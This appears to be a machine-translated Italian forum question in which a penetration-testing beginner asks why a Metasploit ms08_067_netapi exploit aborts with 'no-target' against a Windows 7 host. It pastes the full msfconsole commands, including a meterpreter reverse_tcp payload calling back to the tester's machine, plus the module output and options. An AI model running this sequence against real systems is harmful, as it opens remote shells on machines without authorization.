Sono nuovo di kali linux e solo i test di penetrazione in generale. Sto avendo un po 'di problemi con il framework metasploit nel mio pc. Ho utilizzato questo tutorial e ho ricevuto un errore che diceva "Sfruttamento dello sfruttamento a causa di no-target", e eppure ho fornito un obiettivo. Di seguito è riportato un elenco dei comandi che ho utilizzato e l'errore.
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.0.104
lhost => 192.168.0.104
msf exploit(ms08_067_netapi) > set rhost 192.168.0.105
rhost => 192.168.0.105
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rport 445
rport => 445
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.0.104:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
[aggiorna] qui è l'output di 'show options'
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.0.105 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.104 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting